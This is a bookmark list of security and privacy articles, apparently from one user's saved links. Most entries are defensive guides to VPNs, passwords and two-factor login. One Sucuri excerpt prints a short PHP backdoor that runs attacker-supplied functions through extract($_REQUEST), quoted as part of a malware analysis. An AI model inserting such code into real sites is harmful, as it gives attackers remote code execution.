aetles + security   92

Have I Been Pwned tells the world about security breaches
Troy Hunt’s Have I Been Pwned is a one-stop shop for learning if you’re among the millions affected by security breaches. And he’s trying to do it the responsible way.
passwords  security  hacking 
9 weeks ago by Aetles
drduh/macOS-Security-and-Privacy-Guide: A practical guide to securing macOS.
This guide is a collection of thoughts on and techniques for securing a modern Apple Mac computer ("MacBook") using macOS (formerly known as OS X) version 10.12 "Sierra", as well as steps to generally improving privacy.

This guide is targeted to “power users” who wish to adopt enterprise-standard security, but is also suitable for novice users with an interest in improving their privacy and security on a Mac.

A system is only as secure as its administrator is capable of making it. There is no one single technology, software, nor technique to guarantee perfect computer security; a modern operating system and computer is very complex, and requires numerous incremental changes to meaningfully improve one's security and privacy posture.
mac  macos  security  osx  privacy 
january 2018 by Aetles
Quad 9 | Internet Security and Privacy in a Few Easy Steps
Quad9 is a free, recursive, anycast DNS platform that provides end users robust security protections, high-performance, and privacy. 

Security: Quad9 blocks against known malicious domains, preventing your computers and IoT devices from connecting to malware or phishing sites. Whenever a Quad9 user clicks on a website link or types in an address into a web browser, Quad9 will check the site against the IBM X-Force threat intelligence database of over 40 billion analyzed web pages and images. Quad9 also taps feeds from 18 additional threat intelligence partners to block a large portion of the threats that present risk to end users and businesses alike. 

Performance: Quad9 systems are distributed worldwide in more than 70 locations at launch, with more than 160 locations in total on schedule for 2018. These servers are located primarily at Internet Exchange points, meaning that the distance and time required to get answers is lower than almost any other solution. These systems are distributed worldwide, not just in high-population areas, meaning users in less well-served areas can see significant improvements in speed on DNS lookups. The systems are “anycast” meaning that queries will automatically be routed to the closest operational system. 

Privacy: No personally-identifiable information is collected by the system. IP addresses of end users are not stored to disk or distributed outside of the equipment answering the query in the local data center. Quad9 is a nonprofit organization dedicated only to the operation of DNS services. There are no other secondary revenue streams for personally-identifiable data, and the core charter of the organization is to provide secure, fast, private DNS. 
dns  privacy  security  Internet 
november 2017 by Aetles
Let them paste passwords - NCSC Site
This is why we think SPP is bad, and allowing password pasting is good. The pros outweigh the cons, and by a lot.
forms  javascript  passwords  security  webdevelopment 
may 2017 by Aetles
Theft and Loss Recovery for iOS Users — Fraser Speirs
Let's say, for the sake of argument, that I'm walking down the street in a large city somewhere abroad and I'm approached and forcibly relieved of all the valuable possessions on my person. In a typical tech conference scenario, that would be my iPhone, iPad and Apple Watch all gone.

What now? Well, there are two phases to this: damage limitation and disaster recovery.
security  ios  backup  passwords  icloud  apple  twostepverification 
april 2017 by Aetles
Your Regular WordPress Maintenance Checklist — SitePoint
Here’s a collection of WordPress maintenance checklists for you. Do them regularly, and your site will be speedy and secure. Neglect them, and bad things may happen:

Your site may load as slow as treacle.
Important functionality might break into a hundred pieces.
Your visitors’ computers may be infected with malware.
Your site may be delisted from search engines.
So keep on top of your maintenance. Do it regularly, and it won’t take long.
wordpress  security  maintenance  webdevelopment 
april 2017 by Aetles
PPTP vs L2TP vs OpenVPN vs SSTP vs IKEv2 -
With Edward Snowden’s shocking revelations that the NSA has for years been working to crack and subvert VPN encryption technologies, together with the fact that it is becoming increasingly obvious that most such technologies have been developed and certified by the US government’s National Institute of Standards and Technology (NIST) and may therefore be considered suspect, we have decided it is time to revisit and update this popular article.

We will start with a rundown of the major differences between the different VPN protocols and how they affect you, before looking in more detail at the key concepts involved in cryptography, and how the NSA’s assault on encryption standards affects VPN users.

The discussion below is rather technical, and although I have made every effort to make it as approachable as possible, you may prefer to just jump to the end of the article for a quick summary.
security  vpn 
april 2017 by Aetles
trailofbits/algo: Set up a personal IPSEC VPN in the cloud
Algo VPN is a set of Ansible scripts that simplify the setup of a personal IPSEC VPN. It uses the most secure defaults available, works with common cloud providers, and does not require client software on most devices.
linux  security  vpn 
april 2017 by Aetles
Protecting Your Data at a Border Crossing – Zdziarski's Blog of Things
Once policies that require surrendering passwords (I’ll call them password policies from now on) are adopted, the obvious intelligence benefit will no doubt inspire other countries to establish reciprocity in order to leverage receiving better intelligence about their own citizens traveling abroad. It’s likely the US will inspire many countries, including oppressive nations, to institute the same password policies at the border. This will ultimately be used to skirt search and seizure laws by opening up your data to forensic collection. In other words, you don’t need Microsoft to service a warrant, nor will the soil your data sits on matter, because it will be a border agent connecting directly to your account with special software through the front door.

I am not a lawyer, and I can’t provide you with legal advice about your rights, or what you can do at a border crossing to protect yourself legally, but I can explain the technical implications of this, as well as provide some steps you can take to protect your data regardless of what country you’re entering. Disclaimer: You accept full responsibility and liability for taking any of this information and using it
security  privacy  travel 
february 2017 by Aetles
Decent Security
This is a guide to maintenance for Windows 7 and higher. Although this isn't a computer disinfection guide, it will remove many viruses and repair their damage.

All of these tasks have been performed by me or my scripts across tens, hundreds, or over a thousand computers. You can read my qualifications here.

The order of these steps is purposeful. For example - uninstalling some programs, running a temp file clean, and rebooting can leave them in a broken state.
malware  security  windows  antivirus 
november 2016 by Aetles
TunnelBear: Secure VPN Service
Simple, private, free access to the open Internet you 
Simple privacy apps for Mac & all your devices
mac  vpn  security 
september 2016 by Aetles
"Wrong Way" security problem exposes VPN users' real IP
Another VPN security problem was found: “Wrong Way” may reveal the user’s real IP address, like “Port Fail”. This time not only providers with port forwarding are affected but all providers; they haven’t fixed the problem. The underlying problem is that packets received over the real IP will be answered via the VPN interface under certain conditions.
security  vpn  mac  osx 
december 2015 by Aetles
System Integrity Protection – Adding another layer to Apple’s security model | Der Flounder
System Integrity Protection

To limit what the superuser can do and add another layer to OS X’s security model, Apple has developed SIP and deployed it as part of OS X El Capitan. SIP is designed to limit the power of root and to protect the system even from the superuser. For more details, see below the jump.

SIP is an overall security policy with the goal of preventing system files and processes from being modified by third parties. To achieve this, it has the following concepts:

File system protection
Runtime protection
Kernel extension protection
apple  osx  security  elcapitan 
december 2015 by Aetles
Sucuri SiteCheck - Free Website Malware Scanner
Enter a URL and the Sucuri SiteCheck scanner will check the website for known malware, blacklisting status, website errors, and out-of-date software.
malware  security  scanner  wordpress 
september 2015 by Aetles
Creating a kill-switched VPN on Mac with PIA and Little Snitch
In this post, I describe why, after years of using the wonderful Mac/iOS VPN product, Cloak, I’m experimenting with an alternative approach, that combines Private Internet Access (PIA) and Little Snitch.
apple  network  security  vpn  osx 
august 2015 by Aetles
Fairly Random Thoughts on Ashley Madison & the Swiftly Moving Line — The Message — Medium
AshleyMadison is an online personals service that enables people who want to have extramarital affairs to find each other and, presumably, to do sex things with each other. Its core value, as expressed through its branding and advertising, is discretion. One of the services it offers is that, for a fee, it will erase your account and all record of your account.

The Impact Team is an individual or group that targeted AshleyMadison and, according to Krebs on Security, downloaded the information on 37 million accounts. According to that article, the Impact Team is angry because the erase-your-account feature doesn’t really erase your account. It wants the company that controls AshleyMadison, Avid Life Media of Toronto, to shut down, or it will continue to release information on its users. Its core value appears to be really messing up Avid Life Media’s world.

This is a weird situation. A lot of lives are going to be changed if this information comes out and is publicly accessible.

This piece is just a riff, or what we used to call a “blog post.” I’m going to throw out a few things that I’ve read about and not draw any particular conclusions. Then I’m going to write about a technical idea for making databases more secure, that might have helped AshleyMadison avoid this situation. This is not even a thinkpiece, because I don’t know what I think.
security  privacy  hacking  database  Internet 
july 2015 by Aetles
Chatting in Secret While We're All Being Watched
When you pick up the phone and call someone, or send a text message, or write an email, or send a Facebook message, or chat using Google Hangouts, other people find out what you’re saying, who you’re talking to, and where you’re located. Such private data might only be available to the service provider brokering your conversation, but it might also be visible to the telecom companies carrying your Internet packets, to spy and law enforcement agencies, and even to some nearby teenagers monitoring your Wi-Fi network with Wireshark.

But if you take careful steps to protect yourself, it’s possible to communicate online in a way that’s private, secret and anonymous. Today I’m going to explain in precise terms how to do that. I’ll take techniques NSA whistleblower Edward Snowden used when contacting me two and a half years ago and boil them down to the essentials. In a nutshell, I’ll show you how to create anonymous real-time chat accounts and how to chat over those accounts using an encryption protocol called Off-the-Record Messaging, or OTR.

If you’re in a hurry, you can skip directly to where I explain, step by step, how to set this up for Mac OS X, Windows, Linux and Android. Then, when you have time, come back and read the important caveats preceding those instructions.
security  tor  privacy  surveillance  chat  mac  osx 
july 2015 by Aetles
Using Little Snitch to prevent internet access without VPN
There are a couple of reasons why you would want to access the internet through a VPN: your work requires it, or you regularly work from open Wifi networks, at hotels, coffee shops or libraries, and you want to prevent eavesdropping.

This article presents a simple technique that allows you to force internet access through a VPN when using unsafe networks. I will use Private Internet Access as an example, but this applies to any VPN connection, on any network.
Modify rules in default profile to deny all connections.
Create a “VPN” profile that allows all connections.
Let “Automatic Profile Switching” do the rest.
mac  security  osx  vpn  privacy  encryption  wifi  internet 
june 2015 by Aetles
GRC's | Password Haystacks: How Well Hidden is Your Needle?  
Every password you use can be thought of as a needle hiding in a haystack. After all searches of common passwords and dictionaries have failed, an attacker must resort to a “brute force” search – ultimately trying every possible combination of letters, numbers and then symbols until the combination you chose is discovered.

If every possible password is tried, sooner or later yours will be found.
The question is: Will that be too soon . . . or enough later?

This interactive brute force search space calculator allows you to experiment with password length and composition to develop an accurate and quantified sense for the safety of using passwords that can only be found through exhaustive search. Please see the discussion below for additional information.
passwords  security  privacy  tools 
april 2015 by Aetles
Exploit Exercises provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and general cyber security issues.
hacking  security  games 
april 2015 by Aetles
How to safely use a public Wi-Fi network
Wi-Fi networks in cafés, trains and other public places are inherently insecure. What measures can train passengers or patrons of sidewalk cafés take to protect themselves?
security  wifi  privacy  hacking 
october 2014 by Aetles
What we give away when we log on to a public Wi-Fi network
We took a hacker to a café and, in 20 minutes, he knew where everyone else was born, what schools they attended, and the last five things they googled.
security  wifi  privacy  hacking 
october 2014 by Aetles
Counter-Forensics: Pair-Lock Your iOS 7 Device with Apple’s Configurator | Jonathan Zdziarski's Domain
So what’s the best way to protect yourself from all of these? Pair-lock your device. By pair-locking your device, you’re preventing anyone from dumping data from your phone, installing malicious applications, or doing anything else to it – even if the phone leaves your physical possession, and even if you are forced to give up the PIN code, or unlock it with your fingerprint. When a device is unwilling to create a new pairing session with a desktop machine, nothing can talk to it through its proper interfaces – not forensics tools, not iMobileDevice tools, nothing. And that means unless you have a really old phone with a hardware exploit, there’s no way they’ll be able to dump data from it. In order for them to get at your data, they’d have to steal the pairing record that your own personal desktop has created for the device; if you’re smart enough to be reading this, you’re likely smart enough to also encrypt your hard drive. On a Mac, you’ll find a copy of your pairing record in /var/db/lockdown. Guard it well.
apple  ios  iphone  security 
september 2014 by Aetles
The Start-to-Finish Guide to Securing Your Cloud Storage
There's no such thing as perfect security, but that's no excuse to do nothing, especially when boosting your security is easy. Don't fall for the trope that "if you want it secure you shouldn't store it in the cloud." Cloud storage is a convenient, accessible technology that gives us access to our data anywhere, on multiple devices. It helps us work and makes our lives easier. There's a line to be sure, but it's silly to not use useful technologies simply because of the risk that something bad might happen. Let's talk about how you can mitigate that risk.
cloud  dropbox  security  privacy 
september 2014 by Aetles
Setting up firmware password protection in OS X | Cocktail Blog
Mac users in higher security risk situations may wish to enable an optional firmware password on their machines, which offers an advanced level of protection. In short, a firmware password is a lower level layer of security that is set in the actual Mac logic board’s firmware, rather than at the software layer like FileVault encryption or the standard login password.
mac  osx  mactips  security  passwords 
june 2014 by Aetles
Which VPN Services Take Your Anonymity Seriously? 2014 Edition | TorrentFreak
Millions of people use a VPN service to protect their privacy, but not all VPNs are as anonymous as one might hope. In fact, some VPN services log users' IP-addresses for weeks. To find out how secure VPNs really are TorrentFreak asked the leading providers about their logging policies, and more.

By now most Internet users are well aware of the fact that pretty much every step they take on the Internet is logged or monitored.

To prevent their IP-addresses from being visible to the rest of the Internet, millions of people have signed up to a VPN service. Using a VPN allows users to use the Internet anonymously and prevent snooping.

Unfortunately, not all VPN services are as anonymous as they claim.

Following a high-profile case of an individual using an ‘anonymous’ VPN service that turned out to be not so private, TorrentFreak decided to ask a selection of VPN services some tough questions.

By popular demand we now present the third iteration of our VPN services “logging” review. In addition to questions about logging policies we also asked VPN providers about their stance towards file-sharing traffic, and what they believe the most secure VPN is.
vpn  privacy  security  anonymity 
june 2014 by Aetles
Your iOS device isn’t as encrypted as you think | Jonathan Zdziarski's Domain
So what’s the problem? Well, as of even the latest versions of iOS, the only files protected with this secondary encryption are your mail index, the keychain itself, and third party application files specifically tagged (by the developer) as protected with Data-Protection. Virtually everything else (your contacts, SMS, spotlight cache, photos, and so on) remains unprotected. To demonstrate this, I’ve put together a small recipe you can run on your own jailbroken device to bypass the lock screen. You can then use the GUI to browse through all of the data on the device, without ever providing your PIN. The only thing you’ll not be able to access are the files I’ve just mentioned. This lock screen bypass isn’t really a vulnerability in and of itself; it’s just one of many ways I can demonstrate to you that you don’t need a passphrase to view a vast majority of the data on your phone.
ios  security  hacking  encryption 
may 2014 by Aetles
Should I Change My Password? | How Safe Is Your Password?
What is Should I Change My Password all about?

Avalanche Technology Group is proud to bring you Should I Change My Password, a service that allows you to check anonymously if your password has been compromised.

We comb the depths of the internet to find email and password data sets that have been hacked, leaked or compromised. We aggregate this data so that you can easily check whether your email addresses and passwords have been included in any of these breaches.

By signing up for an Email Watchdog account, you will be immediately notified if any of your email addresses are identified in future breaches. This means that you can change your passwords as soon as possible, preventing opportunistic hackers from accessing your accounts.
Learn more about the Email Watchdog.

We currently have over 203 Million email addresses which have been released by hackers, and this list continues to grow.
hack  password  security  privacy 
april 2014 by Aetles
Phishing with plain text emails
It looks like plain text, but it's actually HTML with unstyled text and more text hidden in between: try copying and pasting the links from these two examples and see for yourself.
phishing  security  mail  email 
march 2014 by Aetles
TidBITS: How to Protect Your iCloud Keychain from the NSA
Apple has released a massive update to its “iOS Security” white paper for IT professionals. It contains more information on iOS security than Apple has ever shared publicly before, including extensive details on Touch ID, Data Protection, network security, application security, and nearly all security-related features, options, and protective controls.

For the first time, we have extensive details on iCloud security. For security professionals like myself, this is like waking up and finding a pot of gold sitting on my keyboard. Along with some of the most impressive security I’ve ever seen, Apple has provided a way to make it impossible for agencies like the NSA to obtain your iCloud Keychain passwords.

The paper is incredibly dense, even getting to the level of detail of which flavor of particular encryption algorithms are used in which security controls. I will likely be digesting it for months, but one particular section contained an important nugget that explains why the NSA can’t snoop on your iCloud Keychain passwords.
apple  ios  security 
march 2014 by Aetles
PHP Backdoors: Hidden With Clever Use of Extract Function | Sucuri Blog
Recently while working on a client website, one of our security analysts, Ben Martin, found a very interesting backdoor that leverages the extract PHP function. The backdoor was hidden on a file called phpinfo.php:

@extract ($_REQUEST);
@die ($ctime($atime));

It is extracting any content sent via GET or POST requests and creating variables for them. That means that in the next part of the code, where it executes “die” (exit) on $ctime($atime), it is actually executing whatever the attacker sends as “ctime” with “atime” as an argument.
php  security  hacking 
february 2014 by Aetles
StartSSL™ Certificates & Public Key Infrastructure - StartSSL™ Free
The StartSSL™ Free (Class 1) certificates are domain or email validated and mostly referred to as the free certificates. Because the checks are performed mostly by electronic means, they require only minimal human intervention from our side. The validations are here to make sure that the subscriber is the owner of the domain name or email account, respectively. You may find additional information on this subject in our CA policy.

The StartSSL™ Free certificates are intended for web sites which require protection of privacy and prevention of eavesdropping. However, information presented within these certificates, except the domain name and email address, is not verified. Should you need higher validated certification, please check out our StartSSL™ Verified (Class 2) certificates.

The StartCom Certification Authority provides the StartSSL™ Free certificates instantly, without limitations and free of charge under the condition that the subscriber provides his/her complete, correct personal details and accepts the Subscriber Obligations of the StartCom CA Policy. Secure your web server and mail traffic now by using the Certificate Control Panel.
security  server  ssl  certificate  webdevelopment  webserver 
january 2014 by Aetles
Malware Hidden Inside JPG EXIF Headers | Sucuri Blog
A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn’t rely on the normal patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.
backdoor  php  security  jpeg 
january 2014 by Aetles
On Hacking MicroSD Cards « bunnie's blog
Today at the Chaos Computer Congress (30C3), xobs and I disclosed a finding that some SD cards contain vulnerabilities that allow arbitrary code execution — on the memory card itself. On the dark side, code execution on the memory card enables a class of MITM (man-in-the-middle) attacks, where the card seems to be behaving one way, but in fact it does something else. On the light side, it also enables the possibility for hardware enthusiasts to gain access to a very cheap and ubiquitous source of microcontrollers.
hacks  security  hardware  memory  hacking 
december 2013 by Aetles
Fake femme fatale dupes IT guys at US government agency | Naked Security
Lakhani pointed out a few lessons from the experiment:

Attractive women can open locked doors in the male-dominated IT industry. A parallel test with a fake male social media profile resulted in no useful connections. A majority of those who offered to help Emily Williams were men. The gender disparity in social engineering has shown up in other situations, including, for example, the 2012 Capture the Flag social engineering contest at Defcon. Anecdotal evidence from the Defcon contest suggested that females might have more compunction than males about duping others, but they may be better at sniffing out a con.
People are trusting and want to help others. Unfortunately, low-level employees don't always think that they could be targets for social engineering because they're not important enough in the organization. They're often unaware of how a simple action like friending somebody on Facebook, for example, could help attackers establish credibility.
security  privacy  hacking 
november 2013 by Aetles
Trick and Treat: The New 1Password Emergency Kit — Productivityist
Clearly this isn't something we plan for, but it can happen. So why not prepare accordingly? With 1Password there to help you with password security and retention, you'll be able to help ease even a little bit of the stress and pain that comes with any sort of emergency that might incapacitate you. This kit -- which is now two full pages -- allows you to print off the information that will be required in the instance that you are not able to offer that information yourself. Whatever kind of thing you classify as an emergency, with 1Password and The 1 Password Emergency Kit prepared you'll have done your due diligence.
security  1password 
november 2013 by Aetles
GRC's | SQRL Secure QR Login  
Summarizing this for your next cocktail party: “The website's login presents a QR code containing the URL of its authentication service, plus a nonce. The user's smartphone signs the login URL using a private key derived from its master secret and the URL's domain name. The Smartphone sends the matching public key to identify the user, and the signature to authenticate it.”
security  privacy  cryptography  authentication 
october 2013 by Aetles
NSA surveillance: how to stay secure | Bruce Schneier | World news |
Now that we have enough details about how the NSA eavesdrops on the internet, including today's disclosures of the NSA's deliberate weakening of cryptographic systems, we can finally start to figure out how to protect ourselves.

For the past two weeks, I have been working with the Guardian on NSA stories, and have read hundreds of top-secret NSA documents provided by whistleblower Edward Snowden. I wasn't part of today's story – it was in process well before I showed up – but everything I read confirms what the Guardian is reporting.

At this point, I feel I can provide some advice for keeping secure against such an adversary.
security  encryption  privacy  surveillance 
september 2013 by Aetles
Errata Security: The Rob Test: 12 Steps to Safer Code
Joel Spolsky has a famous list of "12 Steps to Better Code". I thought I'd create a similar list for safer, more secure code that's resilient against hackers.

The Rob Test
1. Do you use source control, bug tracking, and planning (i.e. GitHub basics)?
2. Do you have automated (one step, daily) builds?
3. Do you have automated regression/unit testing? Can you fix/release in 24 hours?
4. Do you reward testers for breaking things? (like fuzz testing)
5. Do your coders know basic vulns? (buffer-overflows, OWASP Top 10) Do you train them? Do you test new hires?
6. Do you know your attack surface? threat model?
7. Do you sniff the wire to see what's going on? (including sslstrip)
8. Do you have detailed security specifications as part of requirements/design?
9. Do you ban unsafe practices? (strcpy, SQL pasting, clear-text)
10. Do you perform regular static/dynamic analysis on code?
11. Do you have, and practice, an incident response plan? (secure@, bounties, advisories, notification)
12. Are your processes lightweight and used, or heavyweight and ignored?
security  development  programming 
august 2013 by Aetles
How-to: Strengthen your iOS device’s security with a multi-numeric passcode | 9to5Mac
While many of us know about and use the simple four digit passcode or more complex alphanumeric passcode to secure the data on our iOS devices, I recently discovered an interesting option built right into the system that I find to be more secure than a simple passcode and more convenient than an alphanumeric passcode.

As mentioned in a recent episode of the Mac Power Users podcast, you can make your passcode more complex without complicating it by using more than 4 digits without involving letters and still using the num pad.
ios  security  passcode 
august 2013 by Aetles
RaiderSec: How Browsers Store Your Passwords (and Why You Shouldn't Let Them)
In a previous post, I introduced a Twitter bot called dumpmon which monitors paste sites for account dumps, configuration files, and other information. Since then, I've been monitoring the information that is detected. While you can expect a follow-up post with more dumpmon-filled data soon, this post is about how browsers store passwords.

I mention dumpmon because I have started to run across quite a few pastes like this that appear to be credential logs from malware on infected computers. It got me thinking - I've always considered it best to not have browsers store passwords directly, but why? How easy can it be for malware to pull these passwords off of infected computers? Since sources are a bit tough to find in one place, I've decided to post the results here, as well as show some simple code to extract passwords from each browser's password manager.
security  browsers  passwords 
june 2013 by Aetles
iCloud users take note: Apple two-step protection won’t protect your data | Ars Technica
"To me the story here is all about Apple offering a 2FA [two-factor authentication] solution that doesn't really add much extra security for you (files, documents etc), but it protects them (and you) from unauthorized money transactions and changes to your account," Per Thorsheim, a security consultant in Oslo, Norway, wrote in an e-mail to Ars. "People are not made aware of this at all, and it will be a false layer of security when people enable 2FA and put sensitive and secret documents into iCloud."

He continued:

"People EXPECT a 2FA solution to add additional security in order to protect their data, but contrary to Dropbox & Google, Apple doesn't really do that. It's the 'weakest' 2FA solution launched so far by the big and well-known services, it will only add an additional layer of false security to people's minds, which may have dangerous results."
apple  icloud  security  twostepverification 
june 2013 by Aetles
Anatomy of a hack: How crackers ransack passwords like “qeadzcwrsfxv1331” | Ars Technica
In March, readers followed along as Nate Anderson, Ars deputy editor and a self-admitted newbie to password cracking, downloaded a list of more than 16,000 cryptographically hashed passcodes. Within a few hours, he deciphered almost half of them. The moral of the story: if a reporter with zero training in the ancient art of password cracking can achieve such results, imagine what more seasoned attackers can do.

Imagine no more. We asked three cracking experts to attack the same list Anderson targeted and recount the results in all their color and technical detail Iron Chef style. The results, to say the least, were eye opening because they show how quickly even long passwords with letters, numbers, and symbols can be discovered.

The list contained 16,449 passwords converted into hashes using the MD5 cryptographic hash function. Security-conscious websites never store passwords in plaintext. Instead, they work only with these so-called one-way hashes, which are incapable of being mathematically converted back into the letters, numbers, and symbols originally chosen by the user.
passwords  security  privacy  cryptography 
may 2013 by Aetles
The Mailbox security failure that wasn’t |
This can cause some confusion when somebody plugs a locked device into a computer it has previously been plugged in to. The misconception is that because a locked device is plugged into a computer and the contents of the device are readable, that the contents of that device would be readable on any computer that the device is plugged in to; but this is not reality. If you were to lose your phone on the street, then somebody else picked it up, took it home, plugged it into their computer and fired up iExplorer, they would just see a screen telling them to plug in a device. iExplorer has no way to talk to that device until the device has been unlocked, plugged into the computer, and the keys have been exchanged. You can reproduce this behavior on a computer that the device has already been plugged into by going to the '/private/var/db/lockdown' directory on the computer ('%AllUsersProfile%\Apple\Lockdown\' in Windows) and deleting the plist file in that directory that has your device’s UDID in the filename.
apple  ios  security 
may 2013 by Aetles
[1304.6584] When Privacy meets Security: Leveraging personal information for password cracking
Passwords are widely used for user authentication and, despite their weaknesses, will likely remain in use in the foreseeable future. Human-generated passwords typically have a rich structure, which makes them susceptible to guessing attacks. In this paper, we study the effectiveness of guessing attacks based on Markov models. Our contributions are two-fold. First, we propose a novel password cracker based on Markov models, which builds upon and extends ideas used by Narayanan and Shmatikov (CCS 2005). In extensive experiments we show that it can crack up to 69% of passwords at 10 billion guesses, more than all probabilistic password crackers we compared against. Second, we systematically analyze the idea that additional personal information about a user helps in speeding up password guessing. We find that, on average and by carefully choosing parameters, we can guess up to 5% more passwords, especially when the number of attempts is low. Furthermore, we show that the gain can go up to 30% for passwords that are actually based on personal attributes. These passwords are clearly weaker and should be avoided. Our cracker could be used by an organization to detect and reject them. To the best of our knowledge, we are the first to systematically study the relationship between chosen passwords and users' personal information. We test and validate our results over a wide collection of leaked password databases.
passwords  security  research 
april 2013 by Aetles
Setting up Two-Factor Authentication for your Google account AND Microsoft account - Scott Hanselman
I use Two-Factor Authentication for my Google Apps account and I use the Google Authenticator application on my iPhone to generate the second factor.

Microsoft Accounts (formerly Live Accounts) just launched Two-Factor Auth and you should set it up now. That means SkyDrive, as well as the Windows Azure Dashboard can now be fronted by two-factor auth.

If you already use two-factor for Google, you can ADD your Microsoft account to the Google Authenticator application on your Android or iPhone. That means I can use one Authenticator application for all accounts which is extremely convenient.
google  microsoft  security  twostepverification 
april 2013 by Aetles
On hashcat and strong Master Passwords as your best protection | Agile Blog
You may have heard some news going around about hashcat, a password cracking tool, that recently increased its ability to guess Master Passwords for 1Password data files. It’s an impressive achievement for hashcat, and it is important to understand what this does and doesn’t mean for 1Password.
passwords  security  1password  encryption 
april 2013 by Aetles
Free Access To Dozens of Anonymous VPNs Via New University Project | TorrentFreak
The Graduate School of University of Tsukuba, Japan, has just launched the VPN Gate Academic Experiment Project with the aim “to expand the knowledge of Global Distributed Public VPN Relay Servers.” We’re very happy to help them with that today.

How it works

Volunteers have given the University access to dozens of VPN servers located all over the world which people can access from pretty much any device running Windows, Linux, iOS, Android and more. No sign up or user registration is needed. Once connected the user’s IP address is hidden and switched for one issued by the VPN of their choice selected from dozens around the world.
security  vpn  privacy  anonymity 
march 2013 by Aetles
Protecting Drupal's fleshy underbelly with .htaccess | Acquia
In this article, I’m going to show you a few methods to separate your public site from the vulnerable parts of your administration area. What you need is an effective way to keep your site locked and secure, and protected from attacks, while still leaving your site editable for trusted users.

Methods for securing the admin section of your site
One of the things that is often overlooked when setting up and securing a Drupal site is the administrative sections. Sure, Drupal protects these paths with access controls but you can do a lot more to protect your site, especially if your site doesn’t require public login.

If the public has no business accessing /user, they shouldn’t be able to. This path is an attack vector for denial of service (DDoS) and brute force password guessing, and it drastically increases the attack surface of the site.
drupal  security 
march 2013 by Aetles
Hacking the <a> tag in 100 characters
A short while ago, I discovered that JavaScript allows you to change the <a> href after you click on it. It may not seem that serious at first glance, but rest assured, it can trick customers into giving in their details to fraudsters.

Let me show you an example. This link should take you to PayPal.
html  javascript  phishing  security 
march 2013 by Aetles
Is your browser configuration rare or unique? If so, web sites may be able to track you, even if you limit or disable cookies.

Panopticlick tests your browser to see how unique it is based on the information it will share with sites it visits. Click below and you will be given a uniqueness score, letting you see how easily identifiable you might be as you surf the web.
browser  eff  security  privacy  tracking 
march 2013 by Aetles
Muffett on Passwords | dropsafe
TL;DR Summary

don’t let users choose guessable passwords; achieve this by…
encouraging/forcing users to use good password management software, and then…
protect the hashes on the backend by using something decent, ie: bcrypt()
passwords  security 
january 2013 by Aetles
Regrettably @Mat Honan is Entirely Wrong about “Killing Passwords” /cc @Wired | dropsafe
The reason to cling onto passwords is that they are a distributed, non-hierarchical technology.

There is no database other than the essential database of passwords
There is no certificate authority to be spoofed
There is no token database to be stolen
There is no monetisable identity linkage and hence no selective disclosure bunfighting
The likelihood of catastrophic centralised identity mistakes is small
In short: there’s a lot less that can go wrong when the identities are discrete and thinly spread.

So, sorry Mat. You’re wrong all the way up to this point
passwords  security  mathonan 
january 2013 by Aetles
Israel rejects US gun lobby claims on its security
America's top gun lobbyist has his facts wrong when he holds up Israel's stationing of armed guards at all schools as a model of how to avoid another massacre like the Dec. 14, 2012 slaughter of 20 first-graders and six adults at a Connecticut elementary school. What's more, the gun laws in Israel, a country where most people serve in the military, are far more onerous than those in the U.S., containing restrictions that would be anathema to the National Rifle Association and its members.
guns  guncontrol  security  world  usa 
december 2012 by Aetles
Secure Yourself by Using Two-Step Verification on These 16 Web Services - How-To Geek
Two-factor authentication, also known as 2-step verification, provides additional security for your online accounts. Even if someone discovers your password, they’ll need a special one-time code to log in after you enable two-factor authentication on these services.

Notably absent from this list are banks and other financial institutions. It’s a shame that you can use two-factor authentication to protect your in-game currency in an MMORPG, but not the real money in your bank account.
security  twostepverification  passwords 
december 2012 by Aetles
Most web sites ask for a password when you register. After logging in, you can access the site until your session expires. When you forget your password, you can request an email with a link to a password change form. NoPassword factors out the password from this process. You register with an email address and receive a link that gives you a session on that browser until you log out. If you ever need to log in from somewhere else, you can request another email with a link that will log you in wherever you are.
email  passwords  security  tools  authentication 
september 2012 by Aetles
Charlie Miller Takes on NFC, Charlie Miller Wins | threatpost
The Nexus S runs on Android and Miller used the technique, along with a known vulnerability in an older version of the OS to perform the attack. He demonstrated the technique, along with another attack that leverages NFC, during a talk at the Black Hat conference here Wednesday. He can use that Android attack in order to point the user's device to a malicious Web site and then gain complete control of the phone.
All of this by just standing close by or bumping into a victim. The bug in Android that Miller exploits in his attack has been fixed in current versions of Android, but many carriers are slow to push new versions to users, who are, in turn, slow to install updates.

In addition to the work on Nexus S, Miller also did some research on the way that the Nokia N9 Meego operating system handles Bluetooth connections. Under the default settings on the device, Miller found that he could force the phone to pair with any device over Bluetooth by presenting the phone with an NFC tag. The attack works even if the user has Bluetooth pairing disabled on the device, because the phone will allow pairing via NFC.

Once the device is paired with the attacker's phone, the attacker can get complete access to everything on the N9.
nfc  android  hacker  security 
september 2012 by Aetles
ssh - How can I use a passcode generator for authentication for remote logins? - Ask Ubuntu
I would like to strengthen the authentication of my SSH logins by adding another factor: a passcode generator device, or a passcode generation application on my mobile phone. The only obvious options in the default setup are a fixed password and key pair. How can I do this?

(If I use a password plus a passcode generator, this provides two-factor authentication (2FA): the password is “what I know”, and the passcode is “what I have”.)
twofactorauthentication  ssh  googleauthenticator  twostepverification  2fa  iphone  security 
august 2012 by Aetles
Two Factor SSH with Google Authenticator
Last week, Google enabled two factor authentication for everyone. This article explains how to install and configure Google Authenticator in conjunction with SSH for two factor authentication. Two-factor authentication relies on something you know (a password) and something you have (your phone).
google  linux  security  ssh  twostepverification 
august 2012 by Aetles
Eikon Mini, the Compact, Low-cost USB Fingerprint Reader for Today’s PCs and Macs
Passwords On the Go
Almost invisible, keep it plugged-in or carry it with you and use your fingerprint as your master password. The Eikon Mini is the most user friendly, ultra-portable fingerprint reader available.
security  passwords  osx  fingerprints 
july 2012 by Aetles
Red Sweater Blog – Keychain Password Search
Update: As luck would have it, mere moments after publishing this, I got word from the 1Password folks about another write-up that achieves something different (exporting for 1Password), but makes use of the very same approach of automating the clicking of that allow button.
passwords  security  osx  keychain  1password 
june 2012 by Aetles
Confirmed: US and Israel created Stuxnet, lost control of it | Ars Technica
